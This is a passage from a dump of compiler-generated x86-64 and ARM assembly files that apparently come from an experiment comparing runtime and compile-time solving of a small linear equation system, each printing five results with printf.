.LC4:
.long 343597384
.long -1071757394
.align 8
.LC5:
.long 2748779069
.long -1073201808
.ident "GCC: (Ubuntu 5.4.1-2ubuntu1~16.04) 5.4.1 20160904"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 1,084
|
exp/static_c/exp/intel_asm/exp_static_a_b.s
|
.file "exp_static_a_b.c"
.section .rodata.str1.1,"aMS",@progbits,1
.LC6:
.string "%f, %f, %f, %f, %f\n"
.section .text.unlikely,"ax",@progbits
.LCOLDB7:
.section .text.startup,"ax",@progbits
.LHOTB7:
.p2align 4,,15
.globl main
.type main, @function
main:
.LFB22:
.cfi_startproc
subq $8, %rsp
.cfi_def_cfa_offset 16
movl $.LC6, %esi
movl $1, %edi
movsd .LC1(%rip), %xmm4
movl $5, %eax
movsd .LC2(%rip), %xmm3
movsd .LC3(%rip), %xmm2
movsd .LC4(%rip), %xmm1
movsd .LC5(%rip), %xmm0
call __printf_chk
xorl %eax, %eax
addq $8, %rsp
.cfi_def_cfa_offset 8
ret
.cfi_endproc
.LFE22:
.size main, .-main
.section .text.unlikely
.LCOLDE7:
.section .text.startup
.LHOTE7:
.section .rodata.cst8,"aM",@progbits,8
.align 8
.LC1:
.long 3174655768
.long 1071782572
.align 8
.LC2:
.long 3230994035
.long 1073030601
.align 8
.LC3:
.long 83248120
.long 1071841626
.align 8
.LC4:
.long 232640199
.long -1075429521
.align 8
.LC5:
.long 87906252
.long -1075208333
.ident "GCC: (Ubuntu 5.4.1-2ubuntu1~16.04) 5.4.1 20160904"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 4,848
|
exp/static_c/exp/intel_asm/exp_static_a_volatile_b.s
|
.file "exp_static_a_volatile_b.c"
.section .rodata.str1.1,"aMS",@progbits,1
.LC31:
.string "%f, %f, %f, %f, %f\n"
.section .text.unlikely,"ax",@progbits
.LCOLDB32:
.section .text.startup,"ax",@progbits
.LHOTB32:
.p2align 4,,15
.globl main
.type main, @function
main:
.LFB22:
.cfi_startproc
subq $104, %rsp
.cfi_def_cfa_offset 112
movl $.LC31, %esi
movl $1, %edi
movsd .LC1(%rip), %xmm5
movq %fs:40, %rax
movq %rax, 88(%rsp)
xorl %eax, %eax
movsd %xmm5, 48(%rsp)
movabsq $4616212136052895252, %rax
movsd .LC2(%rip), %xmm5
movq %rax, (%rsp)
movabsq $4618655338850743747, %rax
movq %rax, 8(%rsp)
movabsq $-4602554970182894223, %rax
movsd %xmm5, 56(%rsp)
movq %rax, 16(%rsp)
movabsq $-4603162956132589240, %rax
movsd .LC3(%rip), %xmm5
movq %rax, 24(%rsp)
movabsq $-4609366664619292099, %rax
movsd .LC7(%rip), %xmm6
movsd %xmm5, 64(%rsp)
movq %rax, 32(%rsp)
movl $5, %eax
movsd .LC4(%rip), %xmm5
movsd (%rsp), %xmm0
movsd %xmm5, 72(%rsp)
movsd .LC5(%rip), %xmm5
movsd 8(%rsp), %xmm1
movsd %xmm5, 80(%rsp)
movsd 16(%rsp), %xmm2
movsd .LC6(%rip), %xmm5
movsd 24(%rsp), %xmm3
movsd 32(%rsp), %xmm4
mulsd %xmm5, %xmm3
mulsd %xmm4, %xmm6
mulsd %xmm5, %xmm2
movsd .LC10(%rip), %xmm7
mulsd %xmm5, %xmm1
subsd %xmm6, %xmm3
movsd .LC8(%rip), %xmm6
movsd .LC14(%rip), %xmm8
mulsd %xmm4, %xmm6
mulsd %xmm5, %xmm0
mulsd %xmm3, %xmm7
subsd %xmm6, %xmm2
movsd .LC9(%rip), %xmm6
mulsd %xmm6, %xmm2
subsd %xmm7, %xmm2
movsd .LC11(%rip), %xmm7
mulsd %xmm4, %xmm7
mulsd %xmm2, %xmm8
subsd %xmm7, %xmm1
movsd .LC12(%rip), %xmm7
mulsd %xmm3, %xmm7
mulsd %xmm6, %xmm1
subsd %xmm7, %xmm1
movsd .LC13(%rip), %xmm7
mulsd %xmm7, %xmm1
subsd %xmm8, %xmm1
movsd .LC15(%rip), %xmm8
mulsd %xmm4, %xmm8
subsd %xmm8, %xmm0
movsd .LC16(%rip), %xmm8
movsd .LC19(%rip), %xmm9
mulsd %xmm3, %xmm8
mulsd %xmm1, %xmm9
mulsd %xmm6, %xmm0
subsd %xmm8, %xmm0
movsd .LC17(%rip), %xmm8
mulsd %xmm2, %xmm8
mulsd %xmm7, %xmm0
subsd %xmm8, %xmm0
movsd .LC18(%rip), %xmm8
mulsd %xmm8, %xmm0
subsd %xmm9, %xmm0
movsd .LC21(%rip), %xmm9
divsd .LC20(%rip), %xmm0
mulsd %xmm0, %xmm9
subsd %xmm9, %xmm1
divsd %xmm8, %xmm1
movsd .LC22(%rip), %xmm8
mulsd %xmm0, %xmm8
subsd %xmm8, %xmm2
movsd .LC23(%rip), %xmm8
mulsd %xmm1, %xmm8
subsd %xmm8, %xmm2
divsd %xmm7, %xmm2
movsd .LC24(%rip), %xmm7
mulsd %xmm0, %xmm7
subsd %xmm7, %xmm3
movsd .LC25(%rip), %xmm7
mulsd %xmm1, %xmm7
subsd %xmm7, %xmm3
movsd .LC26(%rip), %xmm7
mulsd %xmm2, %xmm7
subsd %xmm7, %xmm3
divsd %xmm6, %xmm3
movsd .LC27(%rip), %xmm6
mulsd %xmm0, %xmm6
subsd %xmm6, %xmm4
movsd .LC28(%rip), %xmm6
mulsd %xmm1, %xmm6
subsd %xmm6, %xmm4
movsd .LC29(%rip), %xmm6
mulsd %xmm2, %xmm6
subsd %xmm6, %xmm4
movsd .LC30(%rip), %xmm6
mulsd %xmm3, %xmm6
subsd %xmm6, %xmm4
divsd %xmm5, %xmm4
call __printf_chk
movq 88(%rsp), %rdx
xorq %fs:40, %rdx
jne .L5
xorl %eax, %eax
addq $104, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 8
ret
.L5:
.cfi_restore_state
call __stack_chk_fail
.cfi_endproc
.LFE22:
.size main, .-main
.section .text.unlikely
.LCOLDE32:
.section .text.startup
.LHOTE32:
.section .rodata.cst8,"aM",@progbits,8
.align 8
.LC1:
.long 3779571220
.long 1074795642
.align 8
.LC2:
.long 1546188227
.long 1075364495
.align 8
.LC3:
.long 3607772529
.long -1071615837
.align 8
.LC4:
.long 343597384
.long -1071757394
.align 8
.LC5:
.long 2748779069
.long -1073201808
.align 8
.LC6:
.long 1202590843
.long -1071940895
.align 8
.LC7:
.long 2233382994
.long 1075335659
.align 8
.LC8:
.long 1889785610
.long -1071838659
.align 8
.LC9:
.long 3717723691
.long 1078075283
.align 8
.LC10:
.long 700938662
.long -1070812614
.align 8
.LC11:
.long 687194767
.long -1072394404
.align 8
.LC12:
.long 886481250
.long -1071744785
.align 8
.LC13:
.long 3276258777
.long 1084323836
.align 8
.LC14:
.long 236911768
.long 1082328925
.align 8
.LC15:
.long 1030792151
.long -1071425782
.align 8
.LC16:
.long 54975582
.long -1069401224
.align 8
.LC17:
.long 2483137056
.long 1083368220
.align 8
.LC18:
.long 2185392678
.long 1095227578
.align 8
.LC19:
.long 1087982832
.long 1096468689
.align 8
.LC20:
.long 3523332949
.long -1027562791
.align 8
.LC21:
.long 2081240824
.long 1095358424
.align 8
.LC22:
.long 1742044232
.long -1065275150
.align 8
.LC23:
.long 2449623945
.long -1064953704
.align 8
.LC24:
.long 3793315116
.long -1068055720
.align 8
.LC25:
.long 3910138227
.long 1077407671
.align 8
.LC26:
.long 2150919621
.long -1068734281
.align 8
.LC27:
.long 2405181686
.long 1075869122
.align 8
.LC28:
.long 343597384
.long 1072777134
.align 8
.LC29:
.long 3779571220
.long 1075975290
.align 8
.LC30:
.long 1374389535
.long 1073815224
.ident "GCC: (Ubuntu 5.4.1-2ubuntu1~16.04) 5.4.1 20160904"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 10,386
|
exp/static_c/exp/intel_asm/exp_runtime.s
|
.file "exp_runtime.c"
.section .text.unlikely,"ax",@progbits
.LCOLDB1:
.text
.LHOTB1:
.p2align 4,,15
.globl aijn
.type aijn, @function
aijn:
.LFB12:
.cfi_startproc
cmpl %r9d, %r8d
je .L5
jmp aijn.part.0
.p2align 4,,10
.p2align 3
.L5:
imull %edx, %r8d
addl %r8d, %ecx
movslq %ecx, %rcx
movsd (%rdi,%rcx,8), %xmm0
ret
.cfi_endproc
.LFE12:
.size aijn, .-aijn
.section .text.unlikely
.LCOLDE1:
.text
.LHOTE1:
.section .text.unlikely
.LCOLDB2:
.text
.LHOTB2:
.p2align 4,,15
.type aijn.part.0, @function
aijn.part.0:
.LFB17:
.cfi_startproc
pushq %r15
.cfi_def_cfa_offset 16
.cfi_offset 15, -16
pushq %r14
.cfi_def_cfa_offset 24
.cfi_offset 14, -24
movl %r9d, %r14d
pushq %r13
.cfi_def_cfa_offset 32
.cfi_offset 13, -32
leal 1(%r8), %r13d
pushq %r12
.cfi_def_cfa_offset 40
.cfi_offset 12, -40
pushq %rbp
.cfi_def_cfa_offset 48
.cfi_offset 6, -48
pushq %rbx
.cfi_def_cfa_offset 56
.cfi_offset 3, -56
movq %rdi, %rbp
movl %r8d, %ebx
movq %rsi, %r12
movl %r13d, %r8d
subq $40, %rsp
.cfi_def_cfa_offset 96
movl %ecx, %r15d
movl %edx, 28(%rsp)
call aijn
movl %r14d, %r9d
movl %r13d, %r8d
movl %ebx, %ecx
movl %ebx, %edx
movq %r12, %rsi
movq %rbp, %rdi
movsd %xmm0, 8(%rsp)
call aijn
movsd 8(%rsp), %xmm1
movl %r14d, %r9d
movl 28(%rsp), %eax
movl %r13d, %r8d
movl %ebx, %ecx
mulsd %xmm0, %xmm1
movq %r12, %rsi
movq %rbp, %rdi
movl %eax, %edx
movsd %xmm1, 16(%rsp)
call aijn
movl %r14d, %r9d
movl %r13d, %r8d
movl %r15d, %ecx
movl %ebx, %edx
movq %r12, %rsi
movq %rbp, %rdi
movsd %xmm0, 8(%rsp)
call aijn
mulsd 8(%rsp), %xmm0
movsd 16(%rsp), %xmm1
addq $40, %rsp
.cfi_def_cfa_offset 56
popq %rbx
.cfi_def_cfa_offset 48
popq %rbp
.cfi_def_cfa_offset 40
popq %r12
.cfi_def_cfa_offset 32
popq %r13
.cfi_def_cfa_offset 24
subsd %xmm0, %xmm1
popq %r14
.cfi_def_cfa_offset 16
popq %r15
.cfi_def_cfa_offset 8
movapd %xmm1, %xmm0
ret
.cfi_endproc
.LFE17:
.size aijn.part.0, .-aijn.part.0
.section .text.unlikely
.LCOLDE2:
.text
.LHOTE2:
.section .text.unlikely
.LCOLDB3:
.text
.LHOTB3:
.p2align 4,,15
.globl bin
.type bin, @function
bin:
.LFB13:
.cfi_startproc
cmpl %r8d, %ecx
je .L15
pushq %r15
.cfi_def_cfa_offset 16
.cfi_offset 15, -16
leal 1(%rcx), %r15d
pushq %r14
.cfi_def_cfa_offset 24
.cfi_offset 14, -24
pushq %r13
.cfi_def_cfa_offset 32
.cfi_offset 13, -32
pushq %r12
.cfi_def_cfa_offset 40
.cfi_offset 12, -40
movq %rsi, %r14
pushq %rbp
.cfi_def_cfa_offset 48
.cfi_offset 6, -48
pushq %rbx
.cfi_def_cfa_offset 56
.cfi_offset 3, -56
movl %ecx, %ebp
movl %r8d, %ebx
movl %edx, %r12d
movq %rdi, %r13
subq $24, %rsp
.cfi_def_cfa_offset 80
cmpl %r15d, %r8d
je .L16
movl %r8d, %r9d
movl %ecx, %edx
movl %r15d, %r8d
call aijn.part.0
movl %ebx, %r8d
movl %r15d, %ecx
movl %r12d, %edx
movq %r14, %rsi
movq %r13, %rdi
movsd %xmm0, (%rsp)
call bin
movsd (%rsp), %xmm3
movl %ebx, %r9d
movl %r15d, %r8d
movl %ebp, %ecx
movl %r12d, %edx
mulsd %xmm0, %xmm3
movq %r14, %rsi
movq %r13, %rdi
movsd %xmm3, 8(%rsp)
call aijn.part.0
movsd %xmm0, (%rsp)
.L13:
movl %ebx, %r8d
movl %r15d, %ecx
movl %ebp, %edx
movq %r14, %rsi
movq %r13, %rdi
call bin
mulsd (%rsp), %xmm0
movsd 8(%rsp), %xmm1
addq $24, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 56
popq %rbx
.cfi_restore 3
.cfi_def_cfa_offset 48
popq %rbp
.cfi_restore 6
.cfi_def_cfa_offset 40
popq %r12
.cfi_restore 12
.cfi_def_cfa_offset 32
popq %r13
.cfi_restore 13
.cfi_def_cfa_offset 24
subsd %xmm0, %xmm1
popq %r14
.cfi_restore 14
.cfi_def_cfa_offset 16
popq %r15
.cfi_restore 15
.cfi_def_cfa_offset 8
movapd %xmm1, %xmm0
ret
.p2align 4,,10
.p2align 3
.L16:
.cfi_restore_state
movl %r8d, %ecx
call bin
movl %ebp, %eax
imull %ebx, %eax
imull %ebx, %r12d
addl %ebp, %eax
cltq
addl %ebp, %r12d
mulsd 0(%r13,%rax,8), %xmm0
movslq %r12d, %r12
movsd 0(%r13,%r12,8), %xmm5
movsd %xmm5, (%rsp)
movsd %xmm0, 8(%rsp)
jmp .L13
.p2align 4,,10
.p2align 3
.L15:
.cfi_def_cfa_offset 8
.cfi_restore 3
.cfi_restore 6
.cfi_restore 12
.cfi_restore 13
.cfi_restore 14
.cfi_restore 15
movslq %edx, %rdx
movsd (%rsi,%rdx,8), %xmm0
ret
.cfi_endproc
.LFE13:
.size bin, .-bin
.section .text.unlikely
.LCOLDE3:
.text
.LHOTE3:
.section .text.unlikely
.LCOLDB4:
.text
.LHOTB4:
.p2align 4,,15
.globl solve_xi
.type solve_xi, @function
solve_xi:
.LFB14:
.cfi_startproc
pushq %r15
.cfi_def_cfa_offset 16
.cfi_offset 15, -16
leal 1(%rcx), %r15d
pushq %r14
.cfi_def_cfa_offset 24
.cfi_offset 14, -24
pushq %r13
.cfi_def_cfa_offset 32
.cfi_offset 13, -32
pushq %r12
.cfi_def_cfa_offset 40
.cfi_offset 12, -40
movq %rdx, %r13
pushq %rbp
.cfi_def_cfa_offset 48
.cfi_offset 6, -48
pushq %rbx
.cfi_def_cfa_offset 56
.cfi_offset 3, -56
movl %ecx, %ebx
movl %ebx, %edx
movl %r15d, %ecx
movq %rdi, %rbp
subq $40, %rsp
.cfi_def_cfa_offset 96
movl %r8d, %r14d
movq %rsi, 16(%rsp)
call bin
testl %ebx, %ebx
movapd %xmm0, %xmm1
jle .L18
movl %r15d, %eax
leal -1(%rbx), %r12d
imull %ebx, %eax
movl %eax, 28(%rsp)
leaq 1(%r12), %rax
xorl %r12d, %r12d
movq %rax, (%rsp)
jmp .L21
.p2align 4,,10
.p2align 3
.L26:
movl 28(%rsp), %eax
leal (%rax,%r12), %edx
movslq %edx, %rdx
movsd 0(%rbp,%rdx,8), %xmm0
.L20:
mulsd 0(%r13,%r12,8), %xmm0
addq $1, %r12
cmpq (%rsp), %r12
subsd %xmm0, %xmm1
je .L18
.L21:
cmpl %r14d, %r15d
je .L26
movq 16(%rsp), %rsi
movl %r14d, %r9d
movl %r15d, %r8d
movl %r12d, %ecx
movl %ebx, %edx
movq %rbp, %rdi
movsd %xmm1, 8(%rsp)
call aijn.part.0
movsd 8(%rsp), %xmm1
jmp .L20
.p2align 4,,10
.p2align 3
.L18:
movslq %ebx, %rax
cmpl %r14d, %r15d
leaq 0(%r13,%rax,8), %r12
je .L27
movq 16(%rsp), %rsi
movl %r14d, %r9d
movl %r15d, %r8d
movl %ebx, %ecx
movl %ebx, %edx
movq %rbp, %rdi
movsd %xmm1, (%rsp)
call aijn.part.0
movsd (%rsp), %xmm1
.L23:
divsd %xmm0, %xmm1
movsd %xmm1, (%r12)
addq $40, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 56
popq %rbx
.cfi_def_cfa_offset 48
popq %rbp
.cfi_def_cfa_offset 40
popq %r12
.cfi_def_cfa_offset 32
popq %r13
.cfi_def_cfa_offset 24
popq %r14
.cfi_def_cfa_offset 16
popq %r15
.cfi_def_cfa_offset 8
ret
.p2align 4,,10
.p2align 3
.L27:
.cfi_restore_state
movl %r15d, %r10d
imull %ebx, %r10d
addl %r10d, %ebx
movslq %ebx, %rbx
movsd 0(%rbp,%rbx,8), %xmm0
jmp .L23
.cfi_endproc
.LFE14:
.size solve_xi, .-solve_xi
.section .text.unlikely
.LCOLDE4:
.text
.LHOTE4:
.section .text.unlikely
.LCOLDB5:
.text
.LHOTB5:
.p2align 4,,15
.globl runtime_solve
.type runtime_solve, @function
runtime_solve:
.LFB15:
.cfi_startproc
testl %ecx, %ecx
jle .L36
pushq %r14
.cfi_def_cfa_offset 16
.cfi_offset 14, -16
movq %rdi, %r14
pushq %r13
.cfi_def_cfa_offset 24
.cfi_offset 13, -24
movq %rsi, %r13
pushq %r12
.cfi_def_cfa_offset 32
.cfi_offset 12, -32
movq %rdx, %r12
pushq %rbp
.cfi_def_cfa_offset 40
.cfi_offset 6, -40
movl %ecx, %ebp
pushq %rbx
.cfi_def_cfa_offset 48
.cfi_offset 3, -48
xorl %ebx, %ebx
.p2align 4,,10
.p2align 3
.L32:
movl %ebx, %ecx
movl %ebp, %r8d
movq %r12, %rdx
movq %r13, %rsi
movq %r14, %rdi
addl $1, %ebx
call solve_xi
cmpl %ebx, %ebp
jne .L32
popq %rbx
.cfi_restore 3
.cfi_def_cfa_offset 40
popq %rbp
.cfi_restore 6
.cfi_def_cfa_offset 32
popq %r12
.cfi_restore 12
.cfi_def_cfa_offset 24
popq %r13
.cfi_restore 13
.cfi_def_cfa_offset 16
popq %r14
.cfi_restore 14
.cfi_def_cfa_offset 8
.L36:
rep ret
.cfi_endproc
.LFE15:
.size runtime_solve, .-runtime_solve
.section .text.unlikely
.LCOLDE5:
.text
.LHOTE5:
.section .rodata.str1.1,"aMS",@progbits,1
.LC11:
.string "%f, %f, %f, %f, %f\n"
.section .rodata
.align 32
.LC0:
.long 858993459
.long 1075524403
.long 858993459
.long -1072155853
.long 3435973837
.long -1076048692
.long 171798692
.long 1075880919
.long 1030792151
.long -1071425782
.long 2920577761
.long -1073684153
.long 1717986918
.long -1073060250
.long 171798692
.long 1074045911
.long 2061584302
.long 1074114068
.long 687194767
.long -1072394404
.long 171798692
.long 1075225559
.long 3607772529
.long 1075146915
.long 2576980378
.long -1073374823
.long 1717986918
.long 1074882150
.long 1889785610
.long -1071838659
.long 2920577761
.long 1075306823
.long 1546188227
.long -1072577905
.long 343597384
.long 1070679982
.long 2061584302
.long -1071862252
.long 2233382994
.long 1075335659
.long 2405181686
.long 1075869122
.long 343597384
.long 1072777134
.long 3779571220
.long 1075975290
.long 1374389535
.long 1073815224
.long 1202590843
.long -1071940895
.section .text.unlikely
.LCOLDB12:
.section .text.startup,"ax",@progbits
.LHOTB12:
.p2align 4,,15
.globl main
.type main, @function
main:
.LFB16:
.cfi_startproc
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset 6, -16
pushq %rbx
.cfi_def_cfa_offset 24
.cfi_offset 3, -24
movl $.LC0, %esi
movl $25, %ecx
xorl %ebx, %ebx
subq $312, %rsp
.cfi_def_cfa_offset 336
leaq 96(%rsp), %rbp
movsd .LC6(%rip), %xmm5
movsd .LC7(%rip), %xmm6
movq %rbp, %rdi
movsd .LC8(%rip), %xmm7
rep movsq
movsd .LC9(%rip), %xmm0
movsd .LC10(%rip), %xmm1
movq %fs:40, %rax
movq %rax, 296(%rsp)
xorl %eax, %eax
movsd %xmm5, (%rsp)
movsd %xmm6, 8(%rsp)
movsd %xmm7, 16(%rsp)
movsd %xmm0, 24(%rsp)
movsd %xmm1, 32(%rsp)
.L38:
leaq 48(%rsp), %rdx
movl %ebx, %ecx
movl $5, %r8d
movq %rsp, %rsi
movq %rbp, %rdi
addl $1, %ebx
call solve_xi
cmpl $5, %ebx
jne .L38
movsd 80(%rsp), %xmm4
movl $.LC11, %esi
movl $1, %edi
movsd 72(%rsp), %xmm3
movl $5, %eax
movsd 64(%rsp), %xmm2
movsd 56(%rsp), %xmm1
movsd 48(%rsp), %xmm0
call __printf_chk
xorl %eax, %eax
movq 296(%rsp), %rcx
xorq %fs:40, %rcx
jne .L42
addq $312, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 24
popq %rbx
.cfi_def_cfa_offset 16
popq %rbp
.cfi_def_cfa_offset 8
ret
.L42:
.cfi_restore_state
call __stack_chk_fail
.cfi_endproc
.LFE16:
.size main, .-main
.section .text.unlikely
.LCOLDE12:
.section .text.startup
.LHOTE12:
.section .rodata.cst8,"aM",@progbits,8
.align 8
.LC6:
.long 3779571220
.long 1074795642
.align 8
.LC7:
.long 1546188227
.long 1075364495
.align 8
.LC8:
.long 3607772529
.long -1071615837
.align 8
.LC9:
.long 343597384
.long -1071757394
.align 8
.LC10:
.long 2748779069
.long -1073201808
.ident "GCC: (Ubuntu 5.4.1-2ubuntu1~16.04) 5.4.1 20160904"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 6,930
|
exp/static_c/exp/arm_asm/exp_volatile_a_static_b.s
|
.syntax unified
.arch armv7-a
.eabi_attribute 27, 3
.eabi_attribute 28, 1
.fpu vfpv3-d16
.eabi_attribute 20, 1
.eabi_attribute 21, 1
.eabi_attribute 23, 3
.eabi_attribute 24, 1
.eabi_attribute 25, 1
.eabi_attribute 26, 2
.eabi_attribute 30, 2
.eabi_attribute 34, 1
.eabi_attribute 18, 4
.thumb
.file "exp_volatile_a_static_b.c"
.section .text.startup,"ax",%progbits
.align 2
.global main
.thumb
.thumb_func
.type main, %function
main:
@ args = 0, pretend = 0, frame = 368
@ frame_needed = 0, uses_anonymous_args = 0
push {lr}
movw r1, #:lower16:.LANCHOR0
fstmfdd sp!, {d8, d9, d10, d11, d12, d13, d14, d15}
movt r1, #:upper16:.LANCHOR0
movs r2, #200
sub sp, sp, #404
add r0, sp, #200
bl memcpy
fldd d7, [sp, #200]
movw r0, #:lower16:.LC2
movt r0, #:upper16:.LC2
fldd d6, [sp, #208]
fldd d5, [sp, #216]
fldd d3, [sp, #224]
fldd d12, [sp, #232]
fldd d2, [sp, #240]
fldd d1, [sp, #248]
fldd d8, [sp, #256]
fstd d7, [sp, #120]
fstd d8, [sp, #136]
fldd d8, [sp, #264]
fldd d13, [sp, #272]
fldd d9, [sp, #280]
fldd d10, [sp, #288]
fldd d11, [sp, #296]
fldd d14, [sp, #304]
fstd d6, [sp, #96]
fstd d5, [sp, #104]
fldd d6, [sp, #312]
fstd d14, [sp, #64]
fldd d7, [sp, #320]
fldd d14, [sp, #328]
fldd d15, [sp, #336]
fldd d5, [sp, #344]
fstd d3, [sp, #72]
fstd d2, [sp, #112]
fstd d1, [sp, #128]
fstd d9, [sp, #144]
fstd d10, [sp, #152]
fstd d11, [sp, #160]
fstd d5, [sp, #176]
fldd d11, [sp, #352]
fstd d7, [sp, #168]
fldd d7, [sp, #360]
fldd d3, .L3
fcpyd d4, d7
fldd d7, [sp, #368]
fstd d4, [sp, #32]
fcpyd d5, d7
fldd d7, [sp, #376]
fmuld d0, d11, d5
fstd d5, [sp, #40]
fcpyd d1, d7
fmuld d7, d11, d3
fldd d3, [sp, #384]
fstd d1, [sp, #48]
fcpyd d9, d3
fstd d7, [sp, #80]
fmuld d2, d13, d9
fldd d7, [sp, #392]
fldd d3, .L3+8
fstd d9, [sp, #88]
fmuld d5, d6, d9
fmuld d1, d11, d1
fcpyd d10, d2
fldd d2, [sp, #80]
fmscd d10, d8, d7
fcpyd d8, d0
fldd d0, [sp, #88]
fmscd d8, d14, d7
fldd d14, [sp, #64]
fmscd d5, d14, d7
fstd d8, [sp, #56]
fcpyd d14, d1
fldd d1, [sp, #48]
fmscd d14, d15, d7
fldd d15, [sp, #72]
fmuld d4, d11, d4
fstd d14, [sp, #64]
fldd d14, [sp, #168]
fmscd d2, d7, d3
fcpyd d3, d4
fldd d4, [sp, #32]
fmscd d3, d14, d7
fldd d14, [sp, #176]
fstd d2, [sp, #80]
fldd d2, .L3+16
fmuld d9, d12, d9
fstd d3, [sp, #72]
fldd d3, [sp, #40]
fmuld d8, d13, d1
fmuld d11, d11, d0
fmuld d0, d6, d3
fmuld d1, d12, d1
fmscd d9, d15, d7
fldd d15, .L3
fmscd d11, d14, d7
fmuld d3, d6, d15
fldd d15, [sp, #136]
fcpyd d14, d8
fldd d8, [sp, #152]
fmscd d14, d15, d7
fcpyd d15, d0
fldd d0, [sp, #104]
fmscd d15, d8, d7
fmuld d4, d6, d4
fcpyd d8, d1
fldd d1, [sp, #48]
fmscd d8, d0, d7
fldd d0, [sp, #144]
fmscd d3, d7, d2
fstd d8, [sp, #104]
fmscd d4, d0, d7
fldd d0, [sp, #32]
fstd d3, [sp, #152]
fldd d3, [sp, #40]
fmuld d8, d12, d0
fstd d4, [sp, #168]
fmuld d6, d6, d1
fstd d8, [sp, #192]
fldd d1, .L3+24
fldd d8, [sp, #56]
fmuld d4, d12, d3
fldd d3, .L3
fmuld d2, d13, d3
fmuld d3, d13, d0
fldd d0, [sp, #160]
fmscd d6, d0, d7
fldd d0, .L3
fstd d6, [sp, #136]
fldd d6, [sp, #96]
fmscd d2, d7, d1
fmscd d4, d6, d7
fldd d6, [sp, #64]
fstd d2, [sp, #160]
fldd d2, [sp, #112]
fstd d4, [sp, #144]
fmuld d4, d10, d6
fmuld d12, d12, d0
fmscd d4, d11, d14
fstd d12, [sp, #184]
fcpyd d12, d3
fmuld d8, d8, d5
fmscd d12, d2, d7
fcpyd d14, d4
fstd d12, [sp, #176]
fcpyd d4, d8
fldd d12, [sp, #80]
fmscd d4, d11, d15
fldd d8, [sp, #152]
fldd d15, [sp, #104]
fmuld d0, d5, d12
fstd d4, [sp, #96]
fmuld d1, d6, d9
fldd d6, [sp, #40]
fmuld d3, d13, d6
fldd d13, [sp, #72]
fldd d6, .L3+32
fmuld d2, d5, d13
fcpyd d4, d0
fmscd d4, d11, d8
fldd d8, [sp, #168]
fmscd d2, d11, d8
fstd d4, [sp, #104]
fldd d4, [sp, #64]
fldd d8, [sp, #56]
fmscd d1, d11, d15
fstd d2, [sp, #112]
fldd d2, [sp, #192]
fmuld d5, d5, d4
fldd d4, [sp, #120]
fmscd d2, d4, d7
fcpyd d15, d1
fldd d1, [sp, #128]
fmuld d8, d8, d9
fstd d2, [sp, #120]
fldd d2, [sp, #56]
fmscd d3, d1, d7
fldd d1, [sp, #184]
fcpyd d0, d12
fmuld d12, d10, d12
fmuld d13, d10, d13
fmscd d1, d7, d6
fldd d6, [sp, #136]
fmscd d5, d11, d6
fldd d6, [sp, #144]
fmscd d8, d11, d6
fldd d6, [sp, #160]
fmscd d12, d11, d6
fldd d6, [sp, #176]
fmscd d13, d11, d6
fldd d6, [sp, #72]
fmuld d2, d10, d2
fcpyd d4, d3
fldd d3, [sp, #96]
fmuld d10, d9, d0
fmuld d9, d9, d6
fldd d6, [sp, #104]
fldd d0, [sp, #112]
fmuld d0, d14, d0
fmuld d6, d14, d6
fmuld d3, d3, d15
fmscd d2, d4, d11
fldd d4, [sp, #120]
fmscd d10, d11, d1
fmscd d9, d11, d4
fmscd d0, d5, d13
fldd d13, [sp, #96]
fmscd d6, d5, d12
fldd d12, [sp, #104]
fmuld d4, d14, d13
fldd d14, [sp, #112]
fmscd d3, d5, d8
fmuld d1, d15, d14
fmuld d8, d15, d12
fmscd d4, d2, d5
fmscd d8, d5, d10
fldd d10, [sp, #80]
fmscd d1, d5, d9
fmuld d2, d3, d6
fmuld d3, d3, d0
fmscd d2, d4, d8
fmscd d3, d4, d1
fldd d1, [sp, #48]
fdivd d3, d2, d3
fldd d2, [sp, #56]
fnmacd d6, d3, d0
fldd d0, [sp, #32]
fmrrd r2, r3, d3
fdivd d4, d6, d4
fnmacd d12, d3, d14
fstd d4, [sp]
fcpyd d6, d12
fnmacd d6, d4, d13
fldd d13, [sp, #72]
fdivd d6, d6, d5
fldd d5, [sp, #64]
fnmacd d10, d3, d13
fstd d6, [sp, #8]
fnmacd d10, d4, d2
fnmacd d10, d6, d5
fldd d5, .L3
fnmacd d5, d0, d3
fldd d3, [sp, #40]
fldd d0, [sp, #88]
fdivd d10, d10, d11
fnmacd d5, d3, d4
fstd d10, [sp, #16]
fnmacd d5, d1, d6
fcpyd d6, d5
fnmacd d6, d0, d10
fdivd d7, d6, d7
fstd d7, [sp, #24]
bl printf
movs r0, #0
add sp, sp, #404
@ sp needed
fldmfdd sp!, {d8-d15}
ldr pc, [sp], #4
.L4:
.align 3
.L3:
.word -1546188227
.word -1073201808
.word 343597384
.word -1071757394
.word -687194767
.word -1071615837
.word 1546188227
.word 1075364495
.word -515396076
.word 1074795642
.size main, .-main
.section .rodata
.align 3
.LANCHOR0 = . + 0
.LC0:
.word 858993459
.word 1075524403
.word 858993459
.word -1072155853
.word -858993459
.word -1076048692
.word 171798692
.word 1075880919
.word 1030792151
.word -1071425782
.word -1374389535
.word -1073684153
.word 1717986918
.word -1073060250
.word 171798692
.word 1074045911
.word 2061584302
.word 1074114068
.word 687194767
.word -1072394404
.word 171798692
.word 1075225559
.word -687194767
.word 1075146915
.word -1717986918
.word -1073374823
.word 1717986918
.word 1074882150
.word 1889785610
.word -1071838659
.word -1374389535
.word 1075306823
.word 1546188227
.word -1072577905
.word 343597384
.word 1070679982
.word 2061584302
.word -1071862252
.word -2061584302
.word 1075335659
.word -1889785610
.word 1075869122
.word 343597384
.word 1072777134
.word -515396076
.word 1075975290
.word 1374389535
.word 1073815224
.word 1202590843
.word -1071940895
.section .rodata.str1.4,"aMS",%progbits,1
.align 2
.LC2:
.ascii "%f, %f, %f, %f, %f\012\000"
.ident "GCC: (Debian 4.9.2-10) 4.9.2"
.section .note.GNU-stack,"",%progbits
|
akalenuk/wordsandbuttons
| 5,667
|
exp/static_c/exp/arm_asm/exp_triangular_matrix.s
|
.syntax unified
.arch armv7-a
.eabi_attribute 27, 3
